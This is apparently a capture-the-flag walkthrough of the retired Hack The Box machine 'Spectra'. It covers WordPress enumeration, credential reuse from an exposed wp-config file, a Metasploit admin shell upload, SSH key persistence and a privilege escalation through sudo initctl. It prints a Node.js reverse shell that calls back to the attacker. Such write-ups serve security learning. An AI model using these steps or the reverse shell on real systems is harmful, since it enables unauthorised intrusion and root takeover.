Release Date2021-02-27
Retired Date2021-06-26
IP Address10.10.10.229


As usual, we start with nmap to identify the services running on the box, and then continue from there.

$ nmap -p- -sV
Starting Nmap 7.80 ( ) at 2021-05-29 15:50 WEST
Nmap scan report for
Host is up (0.051s latency).
Not shown: 65531 closed ports
22/tcp   open  ssh              OpenSSH 8.1 (protocol 2.0)
80/tcp   open  http             nginx 1.17.4
3306/tcp open  mysql            MySQL (unauthorized)

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 55.86 seconds

This time, besides the usual 22 and 80 ports, we have a 3306 (MySQL/MariaDB) port published too, but let’s not jump into rushed “conclusions” and check the website first.

Opening up the website turns up with some placeholder to and “Issue Tracker” and a “Test” website: website


The first one (on the left) looks like a WordPress site that doesn’t have much content in it yet, or even customization. The second, throws up an error connecting to the database, so I just assumed it was a configuration error on another Wordpress site.

I looked around the working one for some time trying to get some kind of a hint on what could be the next step, and even run a wpscan on the site:

$ wpscan --url http://spectra.htb/main/
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.17
       Sponsored by Automattic -
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart

[+] URL: http://spectra.htb/main/ []
[+] Started: Sat May 29 15:56:33 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: nginx/1.17.4
 |  - X-Powered-By: PHP/5.6.40
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://spectra.htb/main/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  -
 |  -
 |  -
 |  -
 |  -

[+] WordPress readme found: http://spectra.htb/main/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://spectra.htb/main/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  -
 |  -

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://spectra.htb/main/?feed=rss2, <generator></generator>
 |  - http://spectra.htb/main/?feed=comments-rss2, <generator></generator>
 | [!] 2 vulnerabilities identified:
 | [!] Title: WordPress 4.7-5.7 - Authenticated Password Protected Pages Exposure
 |     Fixed in: 5.4.5
 |     References:
 |      -
 |      -
 |      -
 |      -
 |      -
 |      -
 |      -
 | [!] Title: WordPress 3.7 to 5.7.1 - Object Injection in PHPMailer
 |     Fixed in: 5.4.6
 |     References:
 |      -
 |      -
 |      -
 |      -
 |      -
 |      -
 |      -
 |      -

[+] WordPress theme in use: twentytwenty
 | Location: http://spectra.htb/main/wp-content/themes/twentytwenty/
 | Last Updated: 2021-03-09T00:00:00.000Z
 | Readme: http://spectra.htb/main/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 1.7
 | Style URL: http://spectra.htb/main/wp-content/themes/twentytwenty/style.css?ver=1.2
 | Style Name: Twenty Twenty
 | Style URI:
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI:
 | Found By: Css Style In Homepage (Passive Detection)
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://spectra.htb/main/wp-content/themes/twentytwenty/style.css?ver=1.2, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:02 <================================================================================> (137 / 137) 100.00% Time: 00:00:02

[i] No Config Backups Found.

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 2
 | Requests Remaining: 23

[+] Finished: Sat May 29 15:56:43 2021
[+] Requests Done: 174
[+] Cached Requests: 5
[+] Data Sent: 44.168 KB
[+] Data Received: 362.702 KB
[+] Memory used: 203.441 MB
[+] Elapsed time: 00:00:09

Out of all that information, it looks the site has 2 vulnerabilities:

The first one didn’t look much interesting, but the second one looked nice for one to try. Maybe Metasploit has an exploit for it?

msf6 > search phpmailer

Matching Modules

   #  Name                                          Disclosure Date  Rank     Check  Description
   -  ----                                          ---------------  ----     -----  -----------
   0  exploit/multi/http/phpmailer_arg_injection    2016-12-26       manual   No     PHPMailer Sendmail Argument Injection
   1  exploit/unix/webapp/wp_phpmailer_host_header  2017-05-03       average  Yes    WordPress PHPMailer Host Header Command Injection

Interact with a module by name or index. For example info 1, use 1 or use exploit/unix/webapp/wp_phpmailer_host_header

Kewl! Looks like it does. So let’s try it out:

msf6 > use 1
[*] Using configured payload linux/x64/meterpreter_reverse_https
msf6 exploit(unix/webapp/wp_phpmailer_host_header) > show options

Module options (exploit/unix/webapp/wp_phpmailer_host_header):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST          yes       The local host or network interface to listen on. This must be an address on the local machi
                                         ne or to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to the wordpress application
   USERNAME   admin            yes       WordPress username

Payload options (linux/x64/meterpreter_reverse_https):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The local listener hostname
   LPORT  8443             yes       The local listener port
   LURI                    no        The HTTP Path

Exploit target:

   Id  Name
   --  ----
   0   WordPress 4.6 / Exim

Oh bummer ☹️. Looks like we need the a username (and password of course) to execute this exploit. Oh well. The username is easy, the site does actually have a post that the author is “administrator”, so that is the easy part. But how can we get his password?! Time to take a look at the other “test” website.

I noticed the link is actually to the index.php file of the site, so I just tried to remove the index.php part to see if there was anything else there and….


DIRECTORY LISTING ENABLED MAMMA! 🥳 What can we find here 🧐? Well, that file looks interesting 😇

 3 * The base configuration for WordPress
 4 *
 5 * The wp-config.php creation script uses this file during the
 6 * installation. You don't have to use the web site, you can
 7 * copy this file to "wp-config.php" and fill in the values.
 8 *
 9 * This file contains the following configurations:
10 *
11 * * MySQL settings
12 * * Secret keys
13 * * Database table prefix
14 * * ABSPATH
15 *
16 * @link
17 *
18 * @package WordPress
19 */
21// ** MySQL settings - You can get this info from your web host ** //
22/** The name of the database for WordPress */
23define( 'DB_NAME', 'dev' );
25/** MySQL database username */
26define( 'DB_USER', 'devtest' );
28/** MySQL database password */
29define( 'DB_PASSWORD', 'devteam01' );
31/** MySQL hostname */
32define( 'DB_HOST', 'localhost' );
34/** Database Charset to use in creating database tables. */
35define( 'DB_CHARSET', 'utf8' );
37/** The Database Collate type. Don't change this if in doubt. */
38define( 'DB_COLLATE', '' );
41 * Authentication Unique Keys and Salts.
42 *
43 * Change these to different unique phrases!
44 * You can generate these using the {@link secret-key service}
45 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
46 *
47 * @since 2.6.0
48 */
49define( 'AUTH_KEY',         'put your unique phrase here' );
50define( 'SECURE_AUTH_KEY',  'put your unique phrase here' );
51define( 'LOGGED_IN_KEY',    'put your unique phrase here' );
52define( 'NONCE_KEY',        'put your unique phrase here' );
53define( 'AUTH_SALT',        'put your unique phrase here' );
54define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
55define( 'LOGGED_IN_SALT',   'put your unique phrase here' );
56define( 'NONCE_SALT',       'put your unique phrase here' );
61 * WordPress Database Table prefix.
62 *
63 * You can have multiple installations in one database if you give each
64 * a unique prefix. Only numbers, letters, and underscores please!
65 */
66$table_prefix = 'wp_';
69 * For developers: WordPress debugging mode.
70 *
71 * Change this to true to enable the display of notices during development.
72 * It is strongly recommended that plugin and theme developers use WP_DEBUG
73 * in their development environments.
74 *
75 * For information on other constants that can be used for debugging,
76 * visit the documentation.
77 *
78 * @link
79 */
80define( 'WP_DEBUG', false );
82/* That's all, stop editing! Happy publishing. */
84/** Absolute path to the WordPress directory. */
85if ( ! defined( 'ABSPATH' ) ) {
86	define( 'ABSPATH', __DIR__ . '/' );
89/** Sets up WordPress vars and included files. */
90require_once ABSPATH . 'wp-settings.php';

OH! A password! If only this could be the administrator user password. I guess it doesn’t hurt to try.


YAY me! 🥳 Ok, if this is the password, maybe now we can use that exploit we found earlier.

msf6 exploit(unix/webapp/wp_phpmailer_host_header) > set lhost
lhost =>
msf6 exploit(unix/webapp/wp_phpmailer_host_header) > set rhost
rhost =>
msf6 exploit(unix/webapp/wp_phpmailer_host_header) > set targeturi /main
targeturi => /main
msf6 exploit(unix/webapp/wp_phpmailer_host_header) > set username administrator
username => administrator
msf6 exploit(unix/webapp/wp_phpmailer_host_header) > set password devteam01
password => devteam01
msf6 exploit(unix/webapp/wp_phpmailer_host_header) > exploit

[*] Started HTTPS reverse handler on
[*] Generating wget command stager
[*] Using URL:
[*] Local IP:
[*] Generating and sending Exim prestager
[-] Exploit aborted due to failure: no-access: WordPress username may be incorrect
[*] Server stopped.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_phpmailer_host_header) > 

Oh well, didn’t work. Maybe the box doesn’t even have Exim installed. But wait, we’re actually admin on the site. We can do whatever we want with it, even uploading some nasty stuff! Luckily for us, Metasploit has a nice exploit that uploads a shell to a WP website if we have control of an admin account. So let’s just use that.

msf6 exploit(unix/webapp/wp_phpmailer_host_header) > use exploit/unix/webapp/wp_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options

Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The WordPress password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   USERNAME                    yes       The WordPress username to authenticate with
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   WordPress

msf6 exploit(unix/webapp/wp_admin_shell_upload) > set lhost
lhost =>
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhost
rhost =>
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /main
targeturi => /main
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set username administrator
username => administrator
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set password devteam01
password => devteam01
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit

[*] Started reverse TCP handler on 
[*] Authenticating with WordPress using administrator:devteam01...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /main/wp-content/plugins/vZLPZPTwbJ/wscnjyzalB.php...
[*] Sending stage (39282 bytes) to
[+] Deleted wscnjyzalB.php
[+] Deleted vZLPZPTwbJ.php
[+] Deleted ../vZLPZPTwbJ
[*] Meterpreter session 1 opened ( -> at 2021-05-29 21:35:11 +0100

meterpreter > shell
Process 6340 created.
Channel 0 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
uid=20155(nginx) gid=20156(nginx) groups=20156(nginx)

And we got our first shell that is running as the nginx user. Now to do some sniffing around to try and see which users are on the box.

grep sh /etc/passwd
shill:!:20104:20104:user for the connection manager:/dev/null:/bin/false
sshd:!:204:204:ssh daemon:/dev/null:/bin/false
crash:!:20137:20137:Crash reporter daemon.:/dev/null:/bin/false
fuse-sshfs:!:305:305:FUSE-based SFTP client:/dev/null:/bin/false
shill-crypto:!:237:237:shill's crypto-util:/dev/null:/bin/false
shill-scripts:!:295:295:shill's debug scripts (when run via debugd):/dev/null:/bin/false

Ok. I guess we need to switch over to katie but how? Wait a minute. nginx user has a shell (notice the /bin/bash at the end)?! I’ll add my ssh key to the authorized_keys file and try to login 🤞.

cd .ssh/
echo "ssh-ed25519 <TRIMMED OUT> r3pek" >> authorized_keys
$ ssh nginx@spectra.htb
nginx@spectra ~ $ whoami
nginx@spectra ~ $ pwd
nginx@spectra ~ $ 

Good! Foothold accomplished!

user flag

Now, we’re on the wrong user to get the flag, and looking around we can see that the flag is actually on the katie user:

nginx@spectra ~ $ ls -lh /home/katie
total 8.0K
drwxr-xr-x 2 katie katie 4.0K Jan 15 15:55 log
-r-------- 1 katie katie   33 Feb  2 15:57 user.txt

The nginx user doesn’t have much access to anything, so I decided to run the script to maybe identify something that I’m missing on my enumeration of the system. The linpeas report is rather big and exhaustive so, I’ll just leave it here for you to download and check it out if you want. Looking at 2351 lines of the report might get one dizzy, and you’ll just have to look everything again because you might have missed something. In one of my re-reads I noticed this lines:

[+] Autologin Files

-rw-r--r-- 1 root root 19 Feb  3 16:43 /etc/autologin/passwd

So, the autologin kicks in and that’s the password for the login. Well, there’s only one user on the box, so maybe that’s katie’s password. Let’s try in out:

$ ssh katie@spectra.htb
(katie@spectra.htb) Password: 
katie@spectra ~ $ cat user.txt 

BINGO! User flag accomplished 🥳

root flag

Now that we have the user flag with us, time to move for the root flag 🏃! What can we execute with sudo for example?

$ sudo -l
User katie may run the following commands on spectra:
    (ALL) SETENV: NOPASSWD: /sbin/initctl

Cool, we can manage services on the box. What kind of services there is here?

$ sudo initctl list  
crash-reporter-early-init stop/waiting
cups-clear-state stop/waiting
dbus_session stop/waiting
failsafe-delay stop/waiting
fwupdtool-activate stop/waiting
send-reclamation-metrics stop/waiting
smbproviderd stop/waiting
tpm_managerd start/running, process 835
udev start/running, process 238
test stop/waiting
test1 stop/waiting
autologin stop/waiting
boot-services start/running
cryptohome-proxy stop/waiting
cryptohomed-client stop/waiting
fixwireless stop/waiting
fwupdtool-getdevices stop/waiting
googletts stop/waiting
ippusb stop/waiting
memd start/running, process 2953
ml-service stop/waiting
neverware_write_running_from_file stop/waiting
avahi start/running, process 2007
boot-update-firmware start/running
cras start/running, process 1999
crosdns stop/waiting
cupsd stop/waiting
failsafe start/running
modemmanager start/running, process 2010
permission_broker start/running, process 1965
send-mount-encrypted-metrics stop/waiting
usbguard stop/waiting
test7 stop/waiting
anomaly-detector start/running, process 2655
cups-pre-upstart-socket-bridge stop/waiting
dbus start/running, process 654
image-burner stop/waiting
ippusb-post-upstart-socket-bridge stop/waiting
log-bootid-on-boot stop/waiting
network-services start/running
oobe_config_restore stop/waiting
pca_agentd start/running, process 1132
send-powerwash-count stop/waiting
test6 stop/waiting
autoinstall stop/waiting
crx-import stop/waiting
eeti-gtouch stop/waiting
file_attrs_cleaner_tool stop/waiting
flatpak_daemon stop/waiting
halt stop/waiting
imageloader stop/waiting
login stop/waiting
pre-shutdown stop/waiting
rc-local start/running, process 711
reboot stop/waiting
regulatory-domain stop/waiting
send-recovery-metrics stop/waiting
trunksd stop/waiting
ui-collect-machine-info stop/waiting
virtualbox stop/waiting
test5 stop/waiting
install-logs stop/waiting
metrics_daemon start/running, process 2933
metrics_library start/running
shill-start-user-session stop/waiting
sommelier stop/waiting
wpasupplicant start/running, process 757
test4 stop/waiting
test10 stop/waiting
activate_date start/running, process 2713
attestationd start/running, process 1731
cleanup-shutdown-logs stop/waiting
dlm-resume stop/waiting
flatpak_update stop/waiting
p2p stop/waiting
rt-limits stop/waiting
seneschal stop/waiting
ui-init-late stop/waiting
boot-complete start/running
bootlockboxd stop/waiting
crash-boot-collect stop/waiting
crash-sender start/running, process 1909
cros_healthd start/running, process 3638
neverware_fixsnd stop/waiting
pepper-flash-player stop/waiting
send-boot-mode stop/waiting
tpm-probe stop/waiting
lockbox-cache start/running
pre-startup stop/waiting
startup stop/waiting
ui-respawn stop/waiting
uinput stop/waiting
usbguard-wrapper stop/waiting
cgroups stop/waiting
chapsd start/running, process 818
conntrackd stop/waiting
cros_configfs start/running
iptables stop/waiting
machine-info stop/waiting
neverware_dmi_logger stop/waiting
patchpanel start/running, process 1912
pstore stop/waiting
trace_marker-test stop/waiting
test9 stop/waiting
bluetoothlog stop/waiting
boot-alert-ready stop/waiting
boot-splash stop/waiting
brltty stop/waiting
cryptohomed start/running, process 1056
lorgnette stop/waiting
neverware_fixnet stop/waiting
powerd stop/waiting
preload-network stop/waiting
pulseaudio stop/waiting
sysrq-init stop/waiting
system-proxy stop/waiting
upstart-socket-bridge start/running, process 2074
test8 stop/waiting
crash-reporter stop/waiting
debugd stop/waiting
ip6tables stop/waiting
ippusb-pre-upstart-socket-bridge stop/waiting
openssh-server stop/waiting
send-kernel-errors stop/waiting
shill-stop-user-session stop/waiting
tcsd start/running
tlsdated start/running, process 2712
tracefs-init stop/waiting
authpolicyd stop/waiting
check_for_plugin_updates stop/waiting
chunneld stop/waiting
cryptohome-update-userdataauth start/running, process 1964
kerberosd stop/waiting
logout stop/waiting
mount-encrypted stop/waiting
shill start/running, process 1115
swap stop/waiting
trim stop/waiting
udev-trigger stop/waiting
cpufreq stop/waiting
cros-machine-id-regen-periodic start/running, process 2543
cups-post-upstart-socket-bridge stop/waiting
neverware-client-id stop/waiting
report-power-metrics stop/waiting
send-disk-metrics stop/waiting
system-services start/running
update-engine start/running, process 2036
vm_concierge stop/waiting
btdispatch start/running, process 2663
cros-machine-id-regen-network stop/waiting
dlm stop/waiting
ext-pci-drivers-allowlist stop/waiting
firmware-version stop/waiting
flatpak stop/waiting
fwupdtool-update stop/waiting
imageloader-shutdown stop/waiting
mtpd stop/waiting
send-boot-metrics stop/waiting
send-hardware-info stop/waiting
vm_cicerone stop/waiting
vmlog_forwarder stop/waiting
bluetoothd start/running, process 2656
cros-disks stop/waiting
shill-event stop/waiting
shill_respawn stop/waiting
syslog start/running, process 663
udev-trigger-early stop/waiting
test3 stop/waiting
dlm-suspend stop/waiting
init-homedirs stop/waiting
install-completed start/running
journald start/running, process 550
log-rotate start/running, process 2099
neverware_daemon start/running, process 1930
neverware_fixhw stop/waiting
oobe_config_save stop/waiting
report-boot-complete stop/waiting
send-uptime-metrics stop/waiting
ui stop/waiting
ureadahead stop/waiting
usb_bouncer stop/waiting
test2 stop/waiting

Damn, that list is big! Is this na NASA box or something?! Nah, doesn’t look like it. Looking at it, besides the test* services in there, nothing looks like out of ordinary here, but we might be wrong. Anyway, let’s just check out those “tests”.

katie@spectra ~ $ ls /etc/init/test*
/etc/init/test.conf   /etc/init/test10.conf  /etc/init/test3.conf  /etc/init/test5.conf  /etc/init/test7.conf  /etc/init/test9.conf
/etc/init/test1.conf  /etc/init/test2.conf   /etc/init/test4.conf  /etc/init/test6.conf  /etc/init/test8.conf
katie@spectra ~ $ cat /etc/init/test.conf
description "Test node.js server"
author      "katie"

start on filesystem or runlevel [2345]
stop on shutdown


    export HOME="/srv"
    echo $$ > /var/run/
    exec /usr/local/share/nodebrew/node/v8.9.4/bin/node /srv/nodetest.js

end script

pre-start script
    echo "[`date`] Node Test Starting" >> /var/log/nodetest.log
end script

pre-stop script
    rm /var/run/
    echo "[`date`] Node Test Stopping" >> /var/log/nodetest.log
end script

Well, they all do the same thing. Basically, they just execute whatever it is in /srv/nodetest.js

katie@spectra ~ $ cd /srv
katie@spectra /srv $ ls -lh
total 4.0K
-rwxrwxr-x 1 root developers 251 Jun 29  2020 nodetest.js
katie@spectra /srv $ groups
katie developers
katie@spectra /srv $ cat nodetest.js 
var http = require("http");

http.createServer(function (request, response) {
   response.writeHead(200, {'Content-Type': 'text/plain'});
   response.end('Hello World\n');

console.log('Server running at');

Doesn’t do much at the moment. Just opens up listener on port 8081 that “spits” out “Hello World\n” to to everyone that connect’s to it. Thing is, we can change this file because we’re in the developers group. What if 🤔 With just a quick google, I found a nodejs reverse shell I could use to replace that file’s contents:

    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(8080, "", function(){
    return /a/; // Prevents the Node.js application form crashing

A quick edit to update the port and IP address that I want it to connect to, and let’s try and see if it works 😉.

katie@spectra /srv $ sudo initctl start test
test start/running, process 7054
katie@spectra /srv $ 
$ nc -nlvp 4444
Ncat: Version 7.80 ( )
Ncat: Listening on :::4444
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
uid=0(root) gid=0(root) groups=0(root)
cd /root
cat root.txt

There you have it! root flag is all ours! 💪

root password hash